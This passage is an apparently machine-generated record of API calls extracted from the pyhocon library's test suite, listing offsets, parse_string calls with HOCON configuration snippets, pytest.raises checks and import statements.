)\n', (49255, 49536), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((49753, 49873), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a = 123\n a = ${?test}\n a = 5\n """'], {}), '(\n """\n a = 123\n a = ${?test}\n a = 5\n """\n )\n', (49779, 49873), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((49939, 50372), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n {\n database {\n host = "localhost"\n port = 8000\n url = ${database.host}":"${database.port}\n }\n\n database {\n host = ${?DB_HOST}\n }\n\n database {\n host = "other.host.net"\n port = 433\n }\n }\n """'], {}), '(\n """\n {\n database {\n host = "localhost"\n port = 8000\n url = ${database.host}":"${database.port}\n }\n\n database {\n host = ${?DB_HOST}\n }\n\n database {\n host = "other.host.net"\n port = 433\n }\n }\n """\n )\n', (49965, 50372), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((50637, 50768), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a = {\n b: 1\n c: 2\n }\n """'], {}), '(\n """\n a = {\n b: 1\n c: 2\n }\n """\n )\n', (50663, 50768), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((50800, 50892), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a.b = 4\n a.d = 3\n """'], {}), '(\n """\n a.b = 4\n a.d = 3\n """)\n', (50826, 50892), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((51082, 51151), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n name: foo\n """'], {}), '("""\n name: foo\n """)\n', (51108, 51151), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((51193, 51299), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['u"""\n longName: "long "${?name}\n """'], {'resolve': '(False)'}), '(\n u"""\n longName: "long "${?name}\n """, resolve=False)\n', (51219, 51299), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((51556, 51729), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n {\n data-center-generic = { cluster-size: 8 }\n misc = "mist"\n }\n """'], {}), '(\n """\n {\n data-center-generic = { cluster-size: 8 }\n misc = "mist"\n }\n """\n )\n', (51582, 51729), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((52289, 52367), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n list = [ 1, 2, 3 ]\n """'], {}), '("""\n list = [ 1, 2, 3 ]\n """)\n', (52315, 52367), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((52408, 52514), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n list = ${list} [ 4, 5, 6 ]\n """'], {'resolve': '(False)'}), '(\n """\n list = ${list} [ 4, 5, 6 ]\n """, resolve=False)\n', (52434, 52514), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((52740, 52818), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n list = [ 1, 2, 3 ]\n """'], {}), '("""\n list = [ 1, 2, 3 ]\n """)\n', (52766, 52818), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((52859, 52957), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n list += [ 4, 5, 6 ]\n """'], {'resolve': '(False)'}), '("""\n list += [ 4, 5, 6 ]\n """,\n resolve=False)\n', (52885, 52957), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((53169, 53317), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a : { }\n b : 1\n c : ${a} { d : [ ${b} ] }\n """'], {'resolve': '(False)'}), '(\n """\n a : { }\n b : 1\n c : ${a} { d : [ ${b} ] }\n """\n , resolve=False)\n', (53195, 53317), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((53360, 53464), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n e : ${a} {\n }\n """'], {'resolve': '(False)'}), '(\n """\n e : ${a} {\n }\n """, resolve=False)\n', (53386, 53464), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((53511, 53553), 'pyhocon.ConfigTree.merge_configs', 'ConfigTree.merge_configs', (['config1', 'config2'], {}), '(config1, config2)\n', (53535, 53553), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((53562, 53604), 'pyhocon.ConfigParser.resolve_substitutions', 'ConfigParser.resolve_substitutions', (['merged'], {}), '(merged)\n', (53596, 53604), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((53721, 53869), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n x : { v1: 1 }\n b1 : {v2: 2 }\n b = [${b1}]\n """'], {'resolve': '(False)'}), '(\n """\n x : { v1: 1 }\n b1 : {v2: 2 }\n b = [${b1}]\n """\n , resolve=False)\n', (53747, 53869), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((53912, 54038), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n b2 : ${x} {v2: 3}\n b += [${b2}]\n """'], {'resolve': '(False)'}), '(\n """\n b2 : ${x} {v2: 3}\n b += [${b2}]\n """,\n resolve=False)\n', (53938, 54038), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((54081, 54123), 'pyhocon.ConfigTree.merge_configs', 'ConfigTree.merge_configs', (['config1', 'config2'], {}), '(config1, config2)\n', (54105, 54123), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((54132, 54174), 'pyhocon.ConfigParser.resolve_substitutions', 'ConfigParser.resolve_substitutions', (['merged'], {}), '(merged)\n', (54166, 54174), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((54381, 54503), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n b1 : { v1: 1 }\n b = [${b1}]\n """'], {'resolve': '(False)'}), '(\n """\n b1 : { v1: 1 }\n b = [${b1}]\n """,\n resolve=False)\n', (54407, 54503), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((54547, 54648), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n b1 : { v1: 2, v2: 3 }\n """'], {'resolve': '(False)'}), '(\n """\n b1 : { v1: 2, v2: 3 }\n """, resolve=False)\n', (54573, 54648), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((54695, 54737), 'pyhocon.ConfigTree.merge_configs', 'ConfigTree.merge_configs', (['config1', 'config2'], {}), '(config1, config2)\n', (54719, 54737), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((54746, 54788), 'pyhocon.ConfigParser.resolve_substitutions', 'ConfigParser.resolve_substitutions', (['merged'], {}), '(merged)\n', (54780, 54788), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((55017, 55092), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n dict = { x: 1 }\n """'], {}), '("""\n dict = { x: 1 }\n """)\n', (55043, 55092), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((55133, 55236), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n dict = ${dict} { y: 2 }\n """'], {'resolve': '(False)'}), '(\n """\n dict = ${dict} { y: 2 }\n """, resolve=False)\n', (55159, 55236), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((55455, 55527), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n string = abc\n """'], {}), '("""\n string = abc\n """)\n', (55481, 55527), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((55568, 55669), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n string = ${string}def\n """'], {'resolve': '(False)'}), '(\n """\n string = ${string}def\n """, resolve=False)\n', (55594, 55669), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((56004, 56096), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a = 1\n mid.b = 1\n """'], {}), '(\n """\n a = 1\n mid.b = 1\n """)\n', (56030, 56096), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((56292, 56520), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n A = ${Test}\n\n Test {\n field1 = 1\n field2 = ${Test.field1}"2"\n field3 = ${Test.field2}"3"\n }\n """'], {}), '(\n """\n A = ${Test}\n\n Test {\n field1 = 1\n field2 = ${Test.field1}"2"\n field3 = ${Test.field2}"3"\n }\n """\n )\n', (56318, 56520), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((56921, 57053), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n test_no_quotes: abc\\\\n\\\\n\n test_quotes: "abc\\\\n\\\\n"\n """'], {}), '(\n """\n test_no_quotes: abc\\\\n\\\\n\n test_quotes: "abc\\\\n\\\\n"\n """\n )\n', (56947, 57053), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((57238, 57434), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\nwith-escaped-backslash: ""\\"\n\\\\\\\\\n""\\"\n\nwith-newline-escape-sequence: ""\\"\n\\\\n\n""\\"\n\nwith-escaped-newline-escape-sequence: ""\\"\n\\\\\\\\n\n""\\"\n """'], {}), '(\n """\nwith-escaped-backslash: ""\\"\n\\\\\\\\\n""\\"\n\nwith-newline-escape-sequence: ""\\"\n\\\\n\n""\\"\n\nwith-escaped-newline-escape-sequence: ""\\"\n\\\\\\\\n\n""\\"\n """\n )\n', (57264, 57434), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((57729, 57825), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n test = line1 line2\ntest2 = test\n """'], {}), '(\n """\n test = line1 line2\ntest2 = test\n """)\n', (57755, 57825), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((58116, 58142), 'pyhocon.ConfigFactory.from_dict', 'ConfigFactory.from_dict', (['d'], {}), '(d)\n', (58139, 58142), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((58231, 58244), 'collections.OrderedDict', 'OrderedDict', ([], {}), '()\n', (58242, 58244), False, 'from collections import OrderedDict\n'), ((58355, 58381), 'pyhocon.ConfigFactory.from_dict', 'ConfigFactory.from_dict', (['d'], {}), '(d)\n', (58378, 58381), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((58469, 58482), 'collections.OrderedDict', 'OrderedDict', ([], {}), '()\n', (58480, 58482), False, 'from collections import OrderedDict\n'), ((58660, 58686), 'pyhocon.ConfigFactory.from_dict', 'ConfigFactory.from_dict', (['d'], {}), '(d)\n', (58683, 58686), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((58766, 59093), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""o1 = {\n foo : {\n a : 1\n b : 2\n }\n }\n o2 = {\n foo : {\n b : 3\n c : 4\n }\n }\n o3 = ${o1} ${o2}\n """'], {}), '(\n """o1 = {\n foo : {\n a : 1\n b : 2\n }\n }\n o2 = {\n foo : {\n b : 3\n c : 4\n }\n }\n o3 = ${o1} ${o2}\n """\n )\n', (58792, 59093), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((59449, 59659), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""base : {\n bar: ["a"]\n }\n\n sub : ${base} {\n baz: ${base.bar} ["b"]\n }\n\n sub2: ${sub}\n """'], {}), '(\n """base : {\n bar: ["a"]\n }\n\n sub : ${base} {\n baz: ${base.bar} ["b"]\n }\n\n sub2: ${sub}\n """\n )\n', (59475, 59659), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((59895, 59999), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n e : ${a} {\n }\n """'], {'resolve': '(False)'}), '(\n """\n e : ${a} {\n }\n """, resolve=False)\n', (59921, 59999), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((60652, 60724), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a = foo bar\n """'], {}), '("""\n a = foo bar\n """)\n', (60678, 60724), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((60874, 60961), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a = foo "bar" dummy\n """'], {}), '(\n """\n a = foo "bar" dummy\n """)\n', (60900, 60961), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((61128, 61351), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n x = 5\n b = test\n a = foo "bar" ${b} dummy\n c = foo ${x} bv\n d = foo ${x} 43\n """'], {}), '(\n """\n x = 5\n b = test\n a = foo "bar" ${b} dummy\n c = foo ${x} bv\n d = foo ${x} 43\n """\n )\n', (61154, 61351), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((61628, 61873), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a: 1\n b: ${c} {\n pa: [${a}]\n pb: ${b.pa}\n }\n c: { }\n d: { pc: ${b.pa} }\n e: ${b}\n """'], {'resolve': '(True)'}), '(\n """\n a: 1\n b: ${c} {\n pa: [${a}]\n pb: ${b.pa}\n }\n c: { }\n d: { pc: ${b.pa} }\n e: ${b}\n """\n , resolve=True)\n', (61654, 61873), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((62122, 62249), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a = // abc\n abc\n\n c =\n 5\n """'], {}), '(\n """\n a = // abc\n abc\n\n c =\n 5\n """\n )\n', (62148, 62249), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((62466, 62562), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n string_from_env = ${STRING_VAR}\n """'], {}), '(\n """\n string_from_env = ${STRING_VAR}\n """)\n', (62492, 62562), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((62805, 62896), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n STRING_VAR = ${STRING_VAR}\n """'], {}), '(\n """\n STRING_VAR = ${STRING_VAR}\n """)\n', (62831, 62896), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((63143, 63235), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n STRING_VAR = ${?STRING_VAR}\n """'], {}), '(\n """\n STRING_VAR = ${?STRING_VAR}\n """)\n', (63169, 63235), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((63448, 63545), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n bool_from_env = ${TRUE_OR_FALSE}\n """'], {}), '(\n """\n bool_from_env = ${TRUE_OR_FALSE}\n """)\n', (63474, 63545), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((63790, 63880), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n int_from_env = ${INT_VAR}\n """'], {}), '(\n """\n int_from_env = ${INT_VAR}\n """)\n', (63816, 63880), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((64237, 64277), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['input_string'], {}), '(input_string)\n', (64263, 64277), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((65203, 65332), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n foo: "1"\n bar: "2"\n # DO NOT CHANGE ANY OF THE ABOVE SETTINGS!"""'], {}), '(\n """\n foo: "1"\n bar: "2"\n # DO NOT CHANGE ANY OF THE ABOVE SETTINGS!"""\n )\n', (65229, 65332), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((65479, 65530), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""a:[""\\"foo""\\"", "bar"]"""'], {}), '(\'a:["""foo"""", "bar"]\')\n', (65505, 65530), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((65653, 65697), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""a:{b: 3, d: 6}"""'], {}), "('a:{b: 3, d: 6}')\n", (65679, 65697), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((66066, 66213), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n foo: ${bar}\n foo: ${baz}\n bar: {r: 1, s: 2}\n baz: {s: 3, t: 4}\n """'], {}), '(\n """\n foo: ${bar}\n foo: ${baz}\n bar: {r: 1, s: 2}\n baz: {s: 3, t: 4}\n """\n )\n', (66092, 66213), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((66358, 66483), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a: 1\n b: {\n pb: 5\n }\n """'], {}), '(\n """\n a: 1\n b: {\n pb: 5\n }\n """\n )\n', (66384, 66483), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((66570, 66693), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n quoted: "abc\\\\"test"\n unquoted: abc\\\\"test\n """'], {}), '(\n """\n quoted: "abc\\\\"test"\n unquoted: abc\\\\"test\n """\n )\n', (66596, 66693), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((66850, 66982), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n value: "{\\\\"critical\\\\":\\\\"0.00\\\\",\\\\"warning\\\\":\\\\"99.99\\\\"}"\n """'], {}), '(\n """\n value: "{\\\\"critical\\\\":\\\\"0.00\\\\",\\\\"warning\\\\":\\\\"99.99\\\\"}"\n """\n )\n', (66876, 66982), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((67124, 67268), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n /abc/cde1: abc\n "/abc/cde2": "cde"\n /abc/cde3: "fgh"\n """'], {}), '(\n """\n /abc/cde1: abc\n "/abc/cde2": "cde"\n /abc/cde3: "fgh"\n """\n )\n', (67150, 67268), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((67458, 68033), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n common : {\n }\n\n b1 = []\n\n var = "wrong"\n\n compilerCommon : ${common} {\n VAR : ${var}\n }\n\n substrate-suite: {\n VAR : "right"\n }\n b1 = [\n ${compilerCommon} ${substrate-suite}\n ${compilerCommon} ${substrate-suite}\n ]\n\n b2 = [\n ${compilerCommon} ${substrate-suite}\n ${compilerCommon} ${substrate-suite}\n ]\n """'], {}), '(\n """\n common : {\n }\n\n b1 = []\n\n var = "wrong"\n\n compilerCommon : ${common} {\n VAR : ${var}\n }\n\n substrate-suite: {\n VAR : "right"\n }\n b1 = [\n ${compilerCommon} ${substrate-suite}\n ${compilerCommon} ${substrate-suite}\n ]\n\n b2 = [\n ${compilerCommon} ${substrate-suite}\n ${compilerCommon} ${substrate-suite}\n ]\n """\n )\n', (67484, 68033), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((68957, 68991), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['source'], {}), '(source)\n', (68983, 68991), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((69765, 69804), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['data_set[0]'], {}), '(data_set[0])\n', (69791, 69804), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((2231, 2264), 'pytest.raises', 'pytest.raises', (['ParseBaseException'], {}), '(ParseBaseException)\n', (2244, 2264), False, 'import pytest\n'), ((2496, 2525), 'pytest.raises', 'pytest.raises', (['ParseException'], {}), '(ParseException)\n', (2509, 2525), False, 'import pytest\n'), ((5331, 5347), 'datetime.timedelta', 'period', ([], {'weeks': '(10)'}), '(weeks=10)\n', (5337, 5347), True, 'from datetime import timedelta as period\n'), ((9465, 9502), 'pytest.raises', 'pytest.raises', (['ConfigMissingException'], {}), '(ConfigMissingException)\n', (9478, 9502), False, 'import pytest\n'), ((11308, 11347), 'pytest.raises', 'pytest.raises', (['ConfigWrongTypeException'], {}), '(ConfigWrongTypeException)\n', (11321, 11347), False, 'import pytest\n'), ((11361, 11402), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""a = [4] "4\\""""'], {}), '(\'a = [4] "4"\')\n', (11387, 11402), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((11416, 11455), 'pytest.raises', 'pytest.raises', (['ConfigWrongTypeException'], {}), '(ConfigWrongTypeException)\n', (11429, 11455), False, 'import pytest\n'), ((11469, 11510), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""a = "4" [5]"""'], {}), '(\'a = "4" [5]\')\n', (11495, 11510), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((11524, 11563), 'pytest.raises', 'pytest.raises', (['ConfigWrongTypeException'], {}), '(ConfigWrongTypeException)\n', (11537, 11563), False, 'import pytest\n'), ((11577, 11621), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""a = {b: 5} "4\\""""'], {}), '(\'a = {b: 5} "4"\')\n', (11603, 11621), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((21736, 21778), 'pytest.raises', 'pytest.raises', (['ConfigSubstitutionException'], {}), '(ConfigSubstitutionException)\n', (21749, 21778), False, 'import pytest\n'), ((21792, 21906), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n common_modules = ${non_existent}\n """'], {}), '(\n """\n common_modules = ${non_existent}\n """\n )\n', (21818, 21906), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((21941, 21983), 'pytest.raises', 'pytest.raises', (['ConfigSubstitutionException'], {}), '(ConfigSubstitutionException)\n', (21954, 21983), False, 'import pytest\n'), ((21997, 22115), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n common_modules = abc ${non_existent}\n """'], {}), '(\n """\n common_modules = abc ${non_existent}\n """\n )\n', (22023, 22115), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((22150, 22192), 'pytest.raises', 'pytest.raises', (['ConfigSubstitutionException'], {}), '(ConfigSubstitutionException)\n', (22163, 22192), False, 'import pytest\n'), ((22206, 22324), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n common_modules = ${non_existent} abc\n """'], {}), '(\n """\n common_modules = ${non_existent} abc\n """\n )\n', (22232, 22324), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((22359, 22401), 'pytest.raises', 'pytest.raises', (['ConfigSubstitutionException'], {}), '(ConfigSubstitutionException)\n', (22372, 22401), False, 'import pytest\n'), ((22415, 22537), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n common_modules = abc ${non_existent} def\n """'], {}), '(\n """\n common_modules = abc ${non_existent} def\n """\n )\n', (22441, 22537), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((22620, 22659), 'pytest.raises', 'pytest.raises', (['ConfigWrongTypeException'], {}), '(ConfigWrongTypeException)\n', (22633, 22659), False, 'import pytest\n'), ((22673, 22834), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n common_modules = [perl]\n host_modules = 55 ${common_modules}\n """'], {}), '(\n """\n common_modules = [perl]\n host_modules = 55 ${common_modules}\n """\n )\n', (22699, 22834), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((22869, 22908), 'pytest.raises', 'pytest.raises', (['ConfigWrongTypeException'], {}), '(ConfigWrongTypeException)\n', (22882, 22908), False, 'import pytest\n'), ((22922, 23083), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n common_modules = [perl]\n host_modules = ${common_modules} 55\n """'], {}), '(\n """\n common_modules = [perl]\n host_modules = ${common_modules} 55\n """\n )\n', (22948, 23083), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((23118, 23157), 'pytest.raises', 'pytest.raises', (['ConfigWrongTypeException'], {}), '(ConfigWrongTypeException)\n', (23131, 23157), False, 'import pytest\n'), ((23171, 23335), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n common_modules = [perl]\n host_modules = aa ${common_modules} bb\n """'], {}), '(\n """\n common_modules = [perl]\n host_modules = aa ${common_modules} bb\n """\n )\n', (23197, 23335), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((23370, 23409), 'pytest.raises', 'pytest.raises', (['ConfigWrongTypeException'], {}), '(ConfigWrongTypeException)\n', (23383, 23409), False, 'import pytest\n'), ((23423, 23584), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n common_modules = [perl]\n host_modules = aa ${common_modules}\n """'], {}), '(\n """\n common_modules = [perl]\n host_modules = aa ${common_modules}\n """\n )\n', (23449, 23584), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((23619, 23658), 'pytest.raises', 'pytest.raises', (['ConfigWrongTypeException'], {}), '(ConfigWrongTypeException)\n', (23632, 23658), False, 'import pytest\n'), ((23672, 23833), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n common_modules = [perl]\n host_modules = ${common_modules} aa\n """'], {}), '(\n """\n common_modules = [perl]\n host_modules = ${common_modules} aa\n """\n )\n', (23698, 23833), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((23868, 23907), 'pytest.raises', 'pytest.raises', (['ConfigWrongTypeException'], {}), '(ConfigWrongTypeException)\n', (23881, 23907), False, 'import pytest\n'), ((23921, 24085), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n common_modules = [perl]\n host_modules = aa ${common_modules} bb\n """'], {}), '(\n """\n common_modules = [perl]\n host_modules = aa ${common_modules} bb\n """\n )\n', (23947, 24085), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((27276, 27318), 'pytest.raises', 'pytest.raises', (['ConfigSubstitutionException'], {}), '(ConfigSubstitutionException)\n', (27289, 27318), False, 'import pytest\n'), ((27332, 27408), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n x = ${x}\n """'], {}), '("""\n x = ${x}\n """)\n', (27358, 27408), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((27509, 27551), 'pytest.raises', 'pytest.raises', (['ConfigSubstitutionException'], {}), '(ConfigSubstitutionException)\n', (27522, 27551), False, 'import pytest\n'), ((27565, 27671), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n x = ${x}\n x = ${x}\n """'], {}), '(\n """\n x = ${x}\n x = ${x}\n 